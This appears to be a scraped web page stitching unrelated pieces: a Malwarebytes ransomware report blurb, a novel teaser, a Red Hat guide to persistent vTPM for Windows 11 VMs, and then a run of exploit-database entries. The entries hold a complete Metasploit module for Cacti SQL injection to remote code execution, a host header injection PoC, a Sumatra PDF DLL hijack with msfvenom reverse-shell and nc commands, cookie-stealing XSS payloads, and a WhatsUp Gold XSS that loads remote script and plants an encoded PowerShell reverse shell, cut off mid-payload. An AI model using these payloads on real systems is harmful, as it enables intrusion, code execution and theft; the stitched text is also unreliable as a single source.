Big Game ransomware is just one of six threats resource-constrained IT teams need to pay attention to in 2024.

Today, Malwarebytes released its 2024 State of Malware report, detailing six cyberthreats that resource-constrained IT teams should pay attention to in 2024. Top of the list is “Big Game” ransomware, the most serious cyberthreat to businesses all around the world.

Big game attacks extort vast ransoms from organizations by holding their data hostage—either with encryption, the threat of damaging data leaks, or both. The report reveals that, awash with money, the number of known Big Game attacks surged by 68% in 2023, thanks to Ransomware-as-a-Service groups like LockBit and ALPHV.

Known ransomware attacks July 2022 – December 2023

Big Game ransomware is just one part of a thriving and highly organized cybercrime business—a multi-billion-dollar mirror to the legitimate economy it feeds off. Its ecosystem supports entire supply chains, dotted about with specialized organizations like access brokers and malicious software vendors. It has brand names, PR stunts, HR departments, incentive schemes, and “employees of the month.”

And like broader, law-abiding “Business” at large, cybercrime has settled on a collection of tools that work. Its activity is built around evergreen techniques like phishing, software exploits, and password guessing, along with mature malicious technologies like info stealers, trojans, and ransomware.

For years, the latest iterations of these ideas have only offered marginal improvements on their predecessors. As a result, innovation in cybercrime has increasingly shifted towards tactics—advancements that focus more on how attacks can succeed and less on what malware can do. The 2024 State of Malware report also details how ransomware gangs use Living of the Land (LotL) techniques to hide in plain sight, and how one gang, CL0P, turned to automated zero-day attacks to break ransomware’s scalability barrier.

The report also explains how cybercriminals turned to a tactic called “malvertising” in 2023, using search ads and disposable websites that mimic legitimate brands to distribute malware as an alternative to malicious emails and document macros.

And as Macs continued to buck the trend in declining PC sales, some criminals began to add Mac malware, like Atomic Stealer, to their Windows distribution channels.

As we enter 2024, malware is as dangerous as ever, but when it is used, it is just one link in an attack chain of multiple different threats. IT and security teams now face active adversaries, zero-day exploits, compromised accounts, social engineering, and a range of other threats that don’t meet the traditional definition of malware. Against this backdrop, security budgets are shrinking while resource-constrained IT and security teams firefight ever more complex environments.

When it comes to security, “more of the same” will not work in 2024, so this year’s report also outlines what effective cyberdefense in the year ahead will require.

To learn more about the most serious threats facing IT teams in 2024, and how to combat them, download the 2024 State of Malware report.

 Known ransomware attacks up 68% in 2023 

“If molecules really were the new microchips, the promise of remote gene editing was that the body could be manipulated to upgrade itself.” An exclusive excerpt from 2054: A Novel.

2054, Part II: Next Big Thing

The trusted platform module (TPM) is a self-contained hardware encryption technology present in recent computer systems. It provides, among other things, hardware random number generation and more secure storage for encryption keys. This enables administrators to encrypt operating system disks that will then only be decryptable on the same system. Version 2.0 of the TPM specification was published in 2015, and Microsoft’s Windows 11 requires a version 2.0 TPM to be present to install.To support operating systems like Windows 11 that require a TPM, libvirt provides a virtual TPM (vTPM) that c

The trusted platform module (TPM) is a self-contained hardware encryption technology present in recent computer systems. It provides, among other things, hardware random number generation and more secure storage for encryption keys. This enables administrators to encrypt operating system disks that will then only be decryptable on the same system. Version 2.0 of the TPM specification was published in 2015, and Microsoft’s Windows 11 requires a version 2.0 TPM to be present to install.

To support operating systems like Windows 11 that require a TPM, libvirt provides a virtual TPM (vTPM) that can be configured with a virtual machine (VM) to provide the appearance of a hardware TPM. Red Hat OpenShift Virtualization has supported vTPM as an option since Red Hat OpenShift 4.13, with the persistent storage capability added in OpenShift 4.14.

This means that a Windows 11 VM can employ BitLocker encryption to its system drives and OpenShift Virtualization will handle the encryption keys on its behalf through the vTPM interface. The virtualized TPM comes with an important caveat; it does not provide the same level of security as a physical chip. Any compliance controls that rely on that physical security should be re-evaluated when considering a move to virtual.

**Preparing the cluster to support a persisted vTPM**

To support the persistent storage of secrets in a VM’s vTPM, OpenShift Virtualization must create a Persistent Volume Claim (PVC) to back that secret storage. The storage class that provides vTPM state must be configured in the HyperConverged custom resource, typically “kubevirt-hyperconverged” in the “openshift-cnv” namespace. The storage class must be a “Filesystem” type (FS), and it should support the “ReadWriteMany” access mode (RWX) in order to allow VMs using a persistent vTPM to make use of live migration. An example of the parameter is below, taken from a cluster using Red Hat OpenShift Data Foundation:

    spec:
       vmStateStorageClass: ocs-external-storagecluster-cephfs

**Adding persistence to a VM**

The change to the VM YAML to set the vTPM to persistent is likewise simple, if deeper in the hierarchy due to the spec.template.spec structure of a VM. The setting for TPM can be found under

    spec.template.spec.domain.devices.tpm

To make the vTPM use persistent storage, add “persistent: true” under “tpm”:

    oc patch vm win11 --type json -p '[{"op": "add", "path": "/spec/template/spec/domain/devices/tpm", "value": {"persistent": true}}]'

The change to the VM may be made while it is running, but it will not take effect until it is stopped and restarted by OpenShift Virtualization. For best results, include this parameter before running the VM for the first time.

Check that the TPM is now persisted by looking for its PVC. In this example, the VM “win11-broken-cow” has a persistent TPM:

    $ oc get vm
    NAME                AGE    STATUS    READY
    win11-broken-cow    2d9h   Running   True
    $ oc get pvc
    NAME                                    STATUS     CAPACITY   ACCESS MODES
    persistent-state-for-win11-broken-cow   Bound      12Mi       RWX
    win11-broken-cow                        Bound      64Gi       RWX

(Some columns have been omitted from output for readability)

There are two important caveats around the vTPM feature. First, a non-persistent vTPM will store and return encryption keys during the lifetime of the virt-launcher Pod the VM runs on. This includes when the guest OS restarts. Therefore, in the case of BitLocker Drive Encryption for a Windows VM, it is not sufficient to select the option, “Run BitLocker system check” while going through the drive encryption wizard. The problem comes as soon as the virt-launcher Pod stops, which happens if you shut down or migrate the VM. Thus, it is possible to encrypt a VM’s disk then immediately lose access to that disk the next time it stops and starts. Windows does its best to force the user to save a copy of the recovery key; in this case, it would be the only way to recover the disk.

The second caveat is that the presence of a persistent vTPM disables the ability to snapshot the VM, as there is no mechanism for snapshotting the vTPM PVC as of the publication of this article. Because of this, online backups of VMs with persistent vTPMs will not be possible. The feature is being tracked in CNV-32718, currently slated for OpenShift 4.17.

**Demonstrating persistence in a Windows 11 VM**

Starting with a Windows 11 base image, create a new VM by cloning the Windows11 template. If there is not an existing base image, generate one by following this guide: Managing virtual machines with OpenShift Pipelines. Edit the YAML of the VM as shown above to include “persistent: true” under “tpm:”. Once the VM boots, check that a “persistent-state-for-” PVC exists for the chosen VM.

At this point, the C: drive may be encrypted with BitLocker Drive Encryption. Choose the option to print the recovery key to a PDF if using the wizard to start the encryption process as there is no currently no option with OpenShift Virtualization to attach a drive in a way Windows recognizes as removable, and the wizard will refuse to  continue if neither option is chosen. Another option for recovery is to join an Active Directory domain that has the BitLocker Key Recovery service set up, but this is beyond the scope of this article, and still insufficient to get the wizard to continue.

Once the encryption process completes, test the key persistence by shutting down the VM from OpenShift Virtualization. (Simply rebooting from within the OS will result in the OS being restarted in the same virt-launcher Pod it was previously running in, so is not a valid test of persistence.)

**Conclusion**

The addition of persistent vTPM to OpenShift Virtualization opens the door to compliant workloads that require encryption at rest. Work is planned to allow snapshotting of the persistent storage so encrypted VMs can be backed up, and the question of whether non-persisted vTPM should fail to save keys has been raised.

Running Windows 11 and 2022 Server Virtual Machines in Red Hat OpenShift with persistent vTPM

This Metasploit exploit module leverages sql injection and local file inclusion vulnerabilities in Cacti versions prior to 1.2.26 to achieve remote code execution. Authentication is needed and the account must have access to the vulnerable PHP script (pollers.php). This is granted by setting the Sites/Devices/Data permission in the General Administration section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::SQLi  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class CactiError < StandardError; end  class CactiNotFoundError < CactiError; end  class CactiVersionNotFoundError < CactiError; end  class CactiNoAccessError < CactiError; end  class CactiCsrfNotFoundError < CactiError; end  class CactiLoginError < CactiError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti RCE via SQLi in pollers.php',        'Description' => %q{          This exploit module leverages a SQLi (CVE-2023-49085) and a LFI          (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to          achieve RCE. Authentication is needed and the account must have access          to the vulnerable PHP script (`pollers.php`). This is granted by          setting the `Sites/Devices/Data` permission in the `General          Administration` section.        },        'License' => MSF_LICENSE,        'Author' => [          'Aleksey Solovev', # Initial research and discovery          'Christophe De La Fuente' # Metasploit module        ],        'References' => [          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE)          [ 'CVE', '2023-49085'], # SQLi          [ 'CVE', '2023-49084'] # LFI (RCE)        ],        'Platform' => ['unix linux win'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ]            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ]        ],        'DefaultOptions' => {          'SqliDelay' => 3        },        'DisclosureDate' => '2023-12-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),        OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])      ]    )  end  def sqli    @sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload|      sqli_final_payload = '"'      sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and')      sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=\""      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'pollers.php'),        'method' => 'POST',        'keep_cookies' => true,        'vars_post' => {          '__csrf_magic' => @csrf_token,          'name' => 'Main Poller',          'hostname' => 'localhost',          'timezone' => '',          'notes' => '',          'processes' => '1',          'threads' => '1',          'id' => '2',          'save_component_poller' => '1',          'action' => 'save',          'dbhost' => sqli_final_payload        },        'vars_get' => {          'header' => 'false'        }      )    end  end  def get_version(html)    # This will return an empty string if there is no match    version_str = html.xpath('//div[@class="versionInfo"]').text    unless version_str.include?('The Cacti Group')      raise CactiNotFoundError, 'The web server is not running Cacti'    end    unless version_str.match(/Version (?<version>\d{1,2}\.\d{1,2}.\d{1,2})/)      raise CactiVersionNotFoundError, 'Could not detect the version'    end    Regexp.last_match[:version]  end  def get_csrf_token(html)    html.xpath('//form/input[@name="__csrf_magic"]/@value').text  end  def do_login    if @csrf_token.blank? || @cacti_version.blank?      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'index.php'),        'method' => 'GET',        'keep_cookies' => true      )      if res.nil?        raise CactiNoAccessError, 'Could not access `index.php` - no response'      end      html = res.get_html_document      if @csrf_token.blank?        print_status('Getting the CSRF token to login')        @csrf_token = get_csrf_token(html)        if @csrf_token.empty?          # raise an error since without the CSRF token, we cannot login          raise CactiCsrfNotFoundError, 'Cannot get the CSRF token'        else          vprint_good("CSRF token: #{@csrf_token}")        end      end      if @cacti_version.blank?        print_status('Getting the version')        begin          @cacti_version = get_version(html)          vprint_good("Version: #{@cacti_version}")        rescue CactiError => e          # We can still log in without the version          print_bad("Could not get the version, the exploit might fail: #{e}")        end      end    end    print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        '__csrf_magic' => @csrf_token,        'action' => 'login',        'login_username' => datastore['USERNAME'],        'login_password' => datastore['PASSWORD']      }    )    raise CactiNoAccessError, 'Could not login - no response' if res.nil?    raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302    print_good('Logged in')  end  def check    # Step 1 - Check if the target is Cacti and get the version    print_status('Checking Cacti version')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?    html = res.get_html_document    begin      @cacti_version = get_version(html)      version_msg = "The web server is running Cacti version #{@cacti_version}"    rescue CactiNotFoundError => e      return CheckCode::Safe(e.message)    rescue CactiVersionNotFoundError => e      return CheckCode::Unknown(e.message)    end    if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26')      print_good(version_msg)    else      return CheckCode::Safe(version_msg)    end    # Step 2 - Login    @csrf_token = get_csrf_token(html)    return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?    begin      do_login    rescue CactiError => e      return CheckCode::Unknown("Login failed: #{e}")    end    @logged_in = true    # Step 3 - Check if the user has enough permissions to reach `pollers.php`    print_status('Checking permissions to access `pollers.php`')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'pollers.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    )    return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?    return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401    return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200    # Step 4 - Check if it is vulnerable to SQLi    print_status('Attempting SQLi to check if the target is vulnerable')    return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable    CheckCode::Vulnerable  end  def get_ext_link_id    # Get an unused External Link ID with a time-based SQLi    @ext_link_id = rand(1000..9999)    loop do      _res, elapsed_time = Rex::Stopwatch.elapsed_time do        sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")      end      break if elapsed_time < datastore['SqliDelay']      @ext_link_id = rand(1000..9999)    end    vprint_good("Got external link ID #{@ext_link_id}")  end  def exploit    # `#do_login` will take care of populating `@csrf_token` and `@cacti_version`    unless @logged_in      begin        do_login      rescue CactiError => e        fail_with(Failure::NoAccess, "Login failure: #{e}")      end    end    @log_file_path = "log/cacti#{rand(1..999)}.log"    print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")    @log_setting_name_bak = '_path_cactilog'    sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")    @do_settings_cleanup = true    sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")    register_file_for_cleanup(@log_file_path)    print_status("Inserting the log file path `#{@log_file_path}` to the external links table")    log_file_path_lfi = "../../#{@log_file_path}"    # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):    #   $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);    log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')    get_ext_link_id    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")    @do_ext_link_cleanup = true    print_status('Getting the user ID and setting permissions (it might take a few minutes)')    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")    @do_perms_cleanup = true    print_status('Logging in again to apply new settings and permissions')    # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.    # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.    cookie_jar_bak = cookie_jar.clone    cookie_jar.clear    csrf_token_bak = @csrf_token    # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token    @csrf_token = nil    begin      do_login    rescue CactiError => e      fail_with(Failure::NoAccess, "Login failure: #{e}")    end    print_status('Poisoning the log')    header_name = rand_text_alpha(1).upcase    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")    print_status('Triggering the payload')    # Expecting no response    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'link.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        header_name => payload.encoded      },      'vars_get' => {        'id' => @ext_link_id,        'headercontent' => 'true'      }    }, 0)    # Restore the cookie_jar and the CSRF token to run cleanup without being blocked    cookie_jar.clear    self.cookie_jar = cookie_jar_bak    @csrf_token = csrf_token_bak  end  def cleanup    super    if @do_ext_link_cleanup      print_status('Cleaning up external link using SQLi')      sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")    end    if @do_perms_cleanup      print_status('Cleaning up permissions using SQLi')      sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")    end    if @do_settings_cleanup      print_status('Cleaning up the log path in `settings` table using SQLi')      sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")      sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")    end  endend

Cacti pollers.php SQL Injection / Remote Code Execution

SISQUAL WFM version 7.1.319.103 suffers from a host header injection vulnerability.

    # Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection# Discovered Date: 17/03/2023# Reported Date: 17/03/2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://www.sisqualwfm.com# Version: 7.1.319.103# Tested on: SISQUAL WFM 7.1.319.103# Affected Version: sisqualWFM - 7.1.319.103# Fixed Version: sisqualWFM - 7.1.319.111# CVE : CVE-2023-36085# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)# Category: Web Apps# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.****************************************************************************************************Orignal Request****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: sisqualwfm.cloudCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Orignal Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://sisqualwfm.cloud/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginDate: Wed, 22 Mar 2023 13:22:10 GMTContent-Length: 0****************************************************************************************************██████╗  ██████╗  ██████╗██╔══██╗██╔═══██╗██╔════╝██████╔╝██║   ██║██║     ██╔═══╝ ██║   ██║██║     ██║     ╚██████╔╝╚██████╗╚═╝      ╚═════╝  ╚═════╝                ****************************************************************************************************Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: evil.comCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://evil.com/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 0****************************************************************************************************Method of Attack****************************************************************************************************curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv****************************************************************************************************

SISQUAL WFM 7.1.319.103 Host Header Injection

Sumatra PDF version 3.5.2 suffers from a DLL hijacking vulnerability.

    # Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking# Date: 06.02.2024# Exploit Author: Ravishanka Silva# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 10, Windows 11# CVE : CVE-2024-24528Description:Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: dbgcore.DLLprofapi.dllPROPSYS.dllTextShaping.dllDWrite.dllProof of Concept:1. Create a malicious .dll file via msfvenom,msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF")3. Start a listener via nc,nc -lvp 77774. Open Sumatra PDF application, and observe the execution of the reverse shell.Demo:https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing

Sumatra PDF 3.5.2 DLL Hijacking

Gym Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original credit for this finding goes to Jyotsna Adhana in October of 2020 but uses a different vector of attack for this software version.

    # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)# Date: 29/09/2023# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip# Version: 1.0# Last Update: 31 August 2022# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30# 1: Create user, login and go to profile.php# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.# 3: When entering the profile.php page, document.cookie will be reflected every time.# AuthorThis vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.# About RapplexRapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.# HTTP Request POST /gym/profile.php HTTP/1.1Host: localhostContent-Length: 129Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGEConnection: closefname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

GYM MS 1.0 Cross Site Scripting

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKA